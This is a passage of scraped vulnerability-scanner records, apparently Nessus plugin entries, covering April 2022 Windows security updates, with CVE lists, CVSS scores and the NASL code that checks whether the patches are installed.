(CVE-2022-26797, CVE-2022-26796,CVE-2022-26904,CVE-2022-26798,CVE-2022-26801, CVE-2022-26802,CVE-2022-26810,CVE-2022-26792,CVE-2022-26794, CVE-2022-26790,CVE-2022-24544,CVE-2022-24540,CVE-2022-24481, CVE-2022-24527,CVE-2022-24474,CVE-2022-24521,CVE-2022-24499, CVE-2022-24494,CVE-2022-24542,CVE-2022-24530)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-26915, CVE-2022-26831)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. 
(CVE-2022-24484, CVE-2022-24538, CVE-2022-26784, CVE-2022-26831, CVE-2022-26915)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2022-04-12T00:00:00", "type": "nessus", "title": "KB5012670: Windows Server 2012 R2 Security Update (April 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21983", "CVE-2022-22008", "CVE-2022-24474", "CVE-2022-24481", "CVE-2022-24483", "CVE-2022-24484", "CVE-2022-24485", "CVE-2022-24491", "CVE-2022-24492", "CVE-2022-24493", "CVE-2022-24494", "CVE-2022-24497", "CVE-2022-24498", "CVE-2022-24499", "CVE-2022-24500", "CVE-2022-24521", "CVE-2022-24527", "CVE-2022-24528", "CVE-2022-24530", "CVE-2022-24533", "CVE-2022-24534", "CVE-2022-24536", "CVE-2022-24538", "CVE-2022-24540", "CVE-2022-24541", "CVE-2022-24542", "CVE-2022-24544", "CVE-2022-24547", "CVE-2022-24550", "CVE-2022-26784", "CVE-2022-26786", "CVE-2022-26787", "CVE-2022-26788", "CVE-2022-26790", "CVE-2022-26792", "CVE-2022-26794", "CVE-2022-26796", "CVE-2022-26797", "CVE-2022-26798", "CVE-2022-26801", "CVE-2022-26802", "CVE-2022-26803", "CVE-2022-26807", "CVE-2022-26808", "CVE-2022-26809", "CVE-2022-26810", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26827", "CVE-2022-26829", "CVE-2022-26831", "CVE-2022-26903", "CVE-2022-26904", "CVE-2022-26915", "CVE-2022-26916", "CVE-2022-26917", "CVE-2022-26918", "CVE-2022-26919"], "modified": "2022-06-01T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_APR_5012639.NASL", "href": "https://www.tenable.com/plugins/nessus/159682", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159682);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/01\");\n\n 
script_cve_id(\n \"CVE-2022-21983\",\n \"CVE-2022-22008\",\n \"CVE-2022-24474\",\n \"CVE-2022-24481\",\n \"CVE-2022-24483\",\n \"CVE-2022-24484\",\n \"CVE-2022-24485\",\n \"CVE-2022-24491\",\n \"CVE-2022-24492\",\n \"CVE-2022-24493\",\n \"CVE-2022-24494\",\n \"CVE-2022-24497\",\n \"CVE-2022-24498\",\n \"CVE-2022-24499\",\n \"CVE-2022-24500\",\n \"CVE-2022-24521\",\n \"CVE-2022-24527\",\n \"CVE-2022-24528\",\n \"CVE-2022-24530\",\n \"CVE-2022-24533\",\n \"CVE-2022-24534\",\n \"CVE-2022-24536\",\n \"CVE-2022-24538\",\n \"CVE-2022-24540\",\n \"CVE-2022-24541\",\n \"CVE-2022-24542\",\n \"CVE-2022-24544\",\n \"CVE-2022-24547\",\n \"CVE-2022-24550\",\n \"CVE-2022-26784\",\n \"CVE-2022-26786\",\n \"CVE-2022-26787\",\n \"CVE-2022-26788\",\n \"CVE-2022-26790\",\n \"CVE-2022-26792\",\n \"CVE-2022-26794\",\n \"CVE-2022-26796\",\n \"CVE-2022-26797\",\n \"CVE-2022-26798\",\n \"CVE-2022-26801\",\n \"CVE-2022-26802\",\n \"CVE-2022-26803\",\n \"CVE-2022-26807\",\n \"CVE-2022-26808\",\n \"CVE-2022-26809\",\n \"CVE-2022-26810\",\n \"CVE-2022-26812\",\n \"CVE-2022-26813\",\n \"CVE-2022-26814\",\n \"CVE-2022-26815\",\n \"CVE-2022-26817\",\n \"CVE-2022-26818\",\n \"CVE-2022-26819\",\n \"CVE-2022-26820\",\n \"CVE-2022-26821\",\n \"CVE-2022-26822\",\n \"CVE-2022-26827\",\n \"CVE-2022-26829\",\n \"CVE-2022-26831\",\n \"CVE-2022-26903\",\n \"CVE-2022-26904\",\n \"CVE-2022-26915\",\n \"CVE-2022-26916\",\n \"CVE-2022-26917\",\n \"CVE-2022-26918\",\n \"CVE-2022-26919\"\n );\n script_xref(name:\"MSKB\", value:\"5012639\");\n script_xref(name:\"MSKB\", value:\"5012670\");\n script_xref(name:\"MSFT\", value:\"MS22-5012639\");\n script_xref(name:\"MSFT\", value:\"MS22-5012670\");\n script_xref(name:\"IAVA\", value:\"2022-A-0147-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0145-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/04\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n\n script_name(english:\"KB5012670: Windows Server 2012 R2 Security Update 
(April 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5012639\nor cumulative update 5012670. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-24474, CVE-2022-24481, CVE-2022-24494,\n CVE-2022-24499, CVE-2022-24521, CVE-2022-24527,\n CVE-2022-24530, CVE-2022-24540, CVE-2022-24542,\n CVE-2022-24544, CVE-2022-24547, CVE-2022-24550,\n CVE-2022-26786, CVE-2022-26787, CVE-2022-26788,\n CVE-2022-26790, CVE-2022-26792, CVE-2022-26794,\n CVE-2022-26796, CVE-2022-26797, CVE-2022-26798,\n CVE-2022-26801, CVE-2022-26802, CVE-2022-26803,\n CVE-2022-26807, CVE-2022-26808, CVE-2022-26810,\n CVE-2022-26827, CVE-2022-26904)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-21983,\n CVE-2022-22008, CVE-2022-24485, CVE-2022-24491,\n CVE-2022-24492, CVE-2022-24500, CVE-2022-24528,\n CVE-2022-24533, CVE-2022-24534, CVE-2022-24536,\n CVE-2022-24541, CVE-2022-26809, CVE-2022-26812,\n CVE-2022-26813, CVE-2022-26814, CVE-2022-26815,\n CVE-2022-26817, CVE-2022-26818, CVE-2022-26819,\n CVE-2022-26820, CVE-2022-26821, CVE-2022-26822,\n CVE-2022-26829, CVE-2022-26903, CVE-2022-26916,\n CVE-2022-26917, CVE-2022-26918, CVE-2022-26919)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-24483, CVE-2022-24493,\n CVE-2022-24498)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. 
(CVE-2022-24484,\n CVE-2022-24538, CVE-2022-26784, CVE-2022-26831,\n CVE-2022-26915)\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5012639 or Cumulative Update 5012670\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-26809\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'User Profile Arbitrary Junction Creation Local Privilege Elevation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-04';\nkbs = make_list(\n '5012670',\n '5012639'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.3',\n sp:0,\n rollup_date:'04_2022',\n bulletin:bulletin,\n rollup_kb_list:[5012670, 5012639])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-19T17:40:43", "description": "The remote Windows host is missing security update 5012592. It is, therefore, affected by multiple vulnerabilities:\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-26831, CVE-2022-26915, CVE-2022-23268)\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. 
(CVE-2022-26916, CVE-2022-26917, CVE-2022-26809, CVE-2022-26919, CVE-2022-26830, CVE-2022-26918, CVE-2022-26826, CVE-2022-24545, CVE-2022-24541, CVE-2022-24492, CVE-2022-24491, CVE-2022-24537, CVE-2022-24487, CVE-2022-24534, CVE-2022-24485, CVE-2022-24533, CVE-2022-24495, CVE-2022-24528, CVE-2022-23257, CVE-2022-21983, CVE-2022-22009, CVE-2022-22008, CVE-2022-24500)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-26920, CVE-2022-24493, CVE-2022-24498, CVE-2022-24483)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges. (CVE-2022-26789, CVE-2022-26786, CVE-2022-26802, CVE-2022-26808, CVE-2022-26807, CVE-2022-26795, CVE-2022-26792, CVE-2022-26794, CVE-2022-26904, CVE-2022-26803, CVE-2022-26797, CVE-2022-26787, CVE-2022-24549, CVE-2022-26914, CVE-2022-26801, CVE-2022-26798, CVE-2022-26793, CVE-2022-26796, CVE-2022-26790, CVE-2022-26788, CVE-2022-24496, CVE-2022-24544, CVE-2022-24540, CVE-2022-24488, CVE-2022-24486, CVE-2022-24481, CVE-2022-24479, CVE-2022-24527, CVE-2022-24474, CVE-2022-24521, CVE-2022-24550, CVE-2022-24499, CVE-2022-24547, CVE-2022-24546, CVE-2022-24494, CVE-2022-24542, CVE-2022-24530)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2022-04-12T00:00:00", "type": "nessus", "title": "KB5012592: Windows 11 Security Update (April 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21983", "CVE-2022-22008", "CVE-2022-22009", "CVE-2022-23257", "CVE-2022-23268", "CVE-2022-24474", "CVE-2022-24479", "CVE-2022-24481", "CVE-2022-24482", "CVE-2022-24483", "CVE-2022-24485", "CVE-2022-24486", "CVE-2022-24487", "CVE-2022-24488", "CVE-2022-24491", "CVE-2022-24492", "CVE-2022-24493", "CVE-2022-24494", "CVE-2022-24495", 
"CVE-2022-24496", "CVE-2022-24497", "CVE-2022-24498", "CVE-2022-24499", "CVE-2022-24500", "CVE-2022-24521", "CVE-2022-24527", "CVE-2022-24528", "CVE-2022-24530", "CVE-2022-24533", "CVE-2022-24534", "CVE-2022-24537", "CVE-2022-24540", "CVE-2022-24541", "CVE-2022-24542", "CVE-2022-24544", "CVE-2022-24545", "CVE-2022-24546", "CVE-2022-24547", "CVE-2022-24549", "CVE-2022-24550", "CVE-2022-26786", "CVE-2022-26787", "CVE-2022-26788", "CVE-2022-26789", "CVE-2022-26790", "CVE-2022-26792", "CVE-2022-26793", "CVE-2022-26794", "CVE-2022-26795", "CVE-2022-26796", "CVE-2022-26797", "CVE-2022-26798", "CVE-2022-26801", "CVE-2022-26802", "CVE-2022-26803", "CVE-2022-26807", "CVE-2022-26808", "CVE-2022-26809", "CVE-2022-26826", "CVE-2022-26830", "CVE-2022-26831", "CVE-2022-26904", "CVE-2022-26914", "CVE-2022-26915", "CVE-2022-26916", "CVE-2022-26917", "CVE-2022-26918", "CVE-2022-26919", "CVE-2022-26920"], "modified": "2022-06-01T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_APR_5012592.NASL", "href": "https://www.tenable.com/plugins/nessus/159671", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159671);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/01\");\n\n script_cve_id(\n \"CVE-2022-21983\",\n \"CVE-2022-22008\",\n \"CVE-2022-22009\",\n \"CVE-2022-23257\",\n \"CVE-2022-23268\",\n \"CVE-2022-24474\",\n \"CVE-2022-24479\",\n \"CVE-2022-24481\",\n \"CVE-2022-24482\",\n \"CVE-2022-24483\",\n \"CVE-2022-24485\",\n \"CVE-2022-24486\",\n \"CVE-2022-24487\",\n \"CVE-2022-24488\",\n \"CVE-2022-24491\",\n \"CVE-2022-24492\",\n \"CVE-2022-24493\",\n \"CVE-2022-24494\",\n \"CVE-2022-24495\",\n \"CVE-2022-24496\",\n \"CVE-2022-24497\",\n \"CVE-2022-24498\",\n \"CVE-2022-24499\",\n \"CVE-2022-24500\",\n \"CVE-2022-24521\",\n \"CVE-2022-24527\",\n \"CVE-2022-24528\",\n \"CVE-2022-24530\",\n 
\"CVE-2022-24533\",\n \"CVE-2022-24534\",\n \"CVE-2022-24537\",\n \"CVE-2022-24540\",\n \"CVE-2022-24541\",\n \"CVE-2022-24542\",\n \"CVE-2022-24544\",\n \"CVE-2022-24545\",\n \"CVE-2022-24546\",\n \"CVE-2022-24547\",\n \"CVE-2022-24549\",\n \"CVE-2022-24550\",\n \"CVE-2022-26786\",\n \"CVE-2022-26787\",\n \"CVE-2022-26788\",\n \"CVE-2022-26789\",\n \"CVE-2022-26790\",\n \"CVE-2022-26792\",\n \"CVE-2022-26793\",\n \"CVE-2022-26794\",\n \"CVE-2022-26795\",\n \"CVE-2022-26796\",\n \"CVE-2022-26797\",\n \"CVE-2022-26798\",\n \"CVE-2022-26801\",\n \"CVE-2022-26802\",\n \"CVE-2022-26803\",\n \"CVE-2022-26807\",\n \"CVE-2022-26808\",\n \"CVE-2022-26809\",\n \"CVE-2022-26826\",\n \"CVE-2022-26830\",\n \"CVE-2022-26831\",\n \"CVE-2022-26904\",\n \"CVE-2022-26914\",\n \"CVE-2022-26915\",\n \"CVE-2022-26916\",\n \"CVE-2022-26917\",\n \"CVE-2022-26918\",\n \"CVE-2022-26919\",\n \"CVE-2022-26920\"\n );\n script_xref(name:\"MSKB\", value:\"5012592\");\n script_xref(name:\"MSFT\", value:\"MS22-5012592\");\n script_xref(name:\"IAVA\", value:\"2022-A-0147-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0145-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/04\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n\n script_name(english:\"KB5012592: Windows 11 Security Update (April 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5012592. It is, therefore, affected by multiple vulnerabilities:\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-26831\n CVE-2022-26915, CVE-2022-23268)\n \n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. 
(CVE-2022-26916, \n CVE-2022-26917, CVE-2022-26809, CVE-2022-26919, \n CVE-2022-26830, CVE-2022-26918, CVE-2022-26826, \n CVE-2022-24545, CVE-2022-24541, CVE-2022-24492,\n CVE-2022-24491, CVE-2022-24537, CVE-2022-24487,\n CVE-2022-24534, CVE-2022-24485, CVE-2022-24533,\n CVE-2022-24495, CVE-2022-24528, CVE-2022-23257,\n CVE-2022-21983, CVE-2022-22009, CVE-2022-22008, \n CVE-2022-24500)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-26920, CVE-2022-24493, \n CVE-2022-24498, CVE-2022-24483)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges. (CVE-2022-26789, \n CVE-2022-26786, CVE-2022-26802, CVE-2022-26808, \n CVE-2022-26807, CVE-2022-26795, CVE-2022-26792, \n CVE-2022-26794, CVE-2022-26904, CVE-2022-26803, \n CVE-2022-26797, CVE-2022-26787, CVE-2022-24549, \n CVE-2022-26914, CVE-2022-26801, CVE-2022-26798, \n CVE-2022-26793, CVE-2022-26796, CVE-2022-26790, \n CVE-2022-26788, CVE-2022-24496, CVE-2022-24544, \n CVE-2022-24540, CVE-2022-24488, CVE-2022-24486, \n CVE-2022-24481, CVE-2022-24479, CVE-2022-24527, \n CVE-2022-24474, CVE-2022-24521, CVE-2022-24550, \n CVE-2022-24499, CVE-2022-24547, CVE-2022-24546, \n CVE-2022-24494, CVE-2022-24542, CVE-2022-24530)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5012592\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5012592\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", 
value:\"CVE-2022-26809\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'User Profile Arbitrary Junction Creation Local Privilege Elevation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-04';\nkbs = make_list(\n '5012592'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'22000',\n rollup_date:'04_2022',\n bulletin:bulletin,\n rollup_kb_list:[5012592])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-19T17:40:44", "description": "The remote Windows host is missing security update 5012591.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. 
An attacker can exploit this to gain elevated privileges.\n (CVE-2022-24474, CVE-2022-24479, CVE-2022-24481, CVE-2022-24486, CVE-2022-24494, CVE-2022-24496, CVE-2022-24499, CVE-2022-24521, CVE-2022-24527, CVE-2022-24530, CVE-2022-24540, CVE-2022-24542, CVE-2022-24544, CVE-2022-24546, CVE-2022-24547, CVE-2022-24549, CVE-2022-24550, CVE-2022-26786, CVE-2022-26787, CVE-2022-26788, CVE-2022-26789, CVE-2022-26790, CVE-2022-26792, CVE-2022-26793, CVE-2022-26794, CVE-2022-26795, CVE-2022-26796, CVE-2022-26797, CVE-2022-26798, CVE-2022-26801, CVE-2022-26802, CVE-2022-26803, CVE-2022-26807, CVE-2022-26808, CVE-2022-26810, CVE-2022-26827, CVE-2022-26828, CVE-2022-26904, CVE-2022-26914)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-26831, CVE-2022-26915)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-21983, CVE-2022-22008, CVE-2022-24485, CVE-2022-24487, CVE-2022-24491, CVE-2022-24492, CVE-2022-24495, CVE-2022-24500, CVE-2022-24528, CVE-2022-24533, CVE-2022-24534, CVE-2022-24537, CVE-2022-24541, CVE-2022-24545, CVE-2022-26809, CVE-2022-26826, CVE-2022-26903, CVE-2022-26916, CVE-2022-26917, CVE-2022-26918, CVE-2022-26919)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. 
(CVE-2022-24483, CVE-2022-24493, CVE-2022-24498, CVE-2022-26920)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2022-04-12T00:00:00", "type": "nessus", "title": "KB5012591: Windows 10 version 1909 / Windows Server 1909 Security Update (April 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21983", "CVE-2022-22008", "CVE-2022-24474", "CVE-2022-24479", "CVE-2022-24481", "CVE-2022-24482", "CVE-2022-24483", "CVE-2022-24485", "CVE-2022-24486", "CVE-2022-24487", "CVE-2022-24491", "CVE-2022-24492", "CVE-2022-24493", "CVE-2022-24494", "CVE-2022-24495", "CVE-2022-24496", "CVE-2022-24497", "CVE-2022-24498", "CVE-2022-24499", "CVE-2022-24500", "CVE-2022-24521", "CVE-2022-24527", "CVE-2022-24528", "CVE-2022-24530", "CVE-2022-24533", "CVE-2022-24534", "CVE-2022-24537", "CVE-2022-24540", "CVE-2022-24541", "CVE-2022-24542", "CVE-2022-24544", "CVE-2022-24545", "CVE-2022-24546", "CVE-2022-24547", "CVE-2022-24549", "CVE-2022-24550", "CVE-2022-26786", "CVE-2022-26787", "CVE-2022-26788", "CVE-2022-26789", "CVE-2022-26790", "CVE-2022-26792", "CVE-2022-26793", "CVE-2022-26794", "CVE-2022-26795", "CVE-2022-26796", "CVE-2022-26797", "CVE-2022-26798", "CVE-2022-26801", "CVE-2022-26802", "CVE-2022-26803", "CVE-2022-26807", "CVE-2022-26808", "CVE-2022-26809", "CVE-2022-26810", "CVE-2022-26826", "CVE-2022-26827", "CVE-2022-26828", "CVE-2022-26831", "CVE-2022-26903", "CVE-2022-26904", "CVE-2022-26914", "CVE-2022-26915", "CVE-2022-26916", "CVE-2022-26917", "CVE-2022-26918", "CVE-2022-26919", "CVE-2022-26920"], "modified": "2022-06-01T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_APR_5012591.NASL", "href": "https://www.tenable.com/plugins/nessus/159679", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159679);\n script_version(\"1.8\");\n 
script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/01\");\n\n script_cve_id(\n \"CVE-2022-21983\",\n \"CVE-2022-22008\",\n \"CVE-2022-24474\",\n \"CVE-2022-24479\",\n \"CVE-2022-24481\",\n \"CVE-2022-24482\",\n \"CVE-2022-24483\",\n \"CVE-2022-24485\",\n \"CVE-2022-24486\",\n \"CVE-2022-24487\",\n \"CVE-2022-24491\",\n \"CVE-2022-24492\",\n \"CVE-2022-24493\",\n \"CVE-2022-24494\",\n \"CVE-2022-24495\",\n \"CVE-2022-24496\",\n \"CVE-2022-24497\",\n \"CVE-2022-24498\",\n \"CVE-2022-24499\",\n \"CVE-2022-24500\",\n \"CVE-2022-24521\",\n \"CVE-2022-24527\",\n \"CVE-2022-24528\",\n \"CVE-2022-24530\",\n \"CVE-2022-24533\",\n \"CVE-2022-24534\",\n \"CVE-2022-24537\",\n \"CVE-2022-24540\",\n \"CVE-2022-24541\",\n \"CVE-2022-24542\",\n \"CVE-2022-24544\",\n \"CVE-2022-24545\",\n \"CVE-2022-24546\",\n \"CVE-2022-24547\",\n \"CVE-2022-24549\",\n \"CVE-2022-24550\",\n \"CVE-2022-26786\",\n \"CVE-2022-26787\",\n \"CVE-2022-26788\",\n \"CVE-2022-26789\",\n \"CVE-2022-26790\",\n \"CVE-2022-26792\",\n \"CVE-2022-26793\",\n \"CVE-2022-26794\",\n \"CVE-2022-26795\",\n \"CVE-2022-26796\",\n \"CVE-2022-26797\",\n \"CVE-2022-26798\",\n \"CVE-2022-26801\",\n \"CVE-2022-26802\",\n \"CVE-2022-26803\",\n \"CVE-2022-26807\",\n \"CVE-2022-26808\",\n \"CVE-2022-26809\",\n \"CVE-2022-26810\",\n \"CVE-2022-26826\",\n \"CVE-2022-26827\",\n \"CVE-2022-26828\",\n \"CVE-2022-26831\",\n \"CVE-2022-26903\",\n \"CVE-2022-26904\",\n \"CVE-2022-26914\",\n \"CVE-2022-26915\",\n \"CVE-2022-26916\",\n \"CVE-2022-26917\",\n \"CVE-2022-26918\",\n \"CVE-2022-26919\",\n \"CVE-2022-26920\"\n );\n script_xref(name:\"MSKB\", value:\"5012591\");\n script_xref(name:\"MSFT\", value:\"MS22-5012591\");\n script_xref(name:\"IAVA\", value:\"2022-A-0145-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0147-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/04\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n\n script_name(english:\"KB5012591: Windows 10 
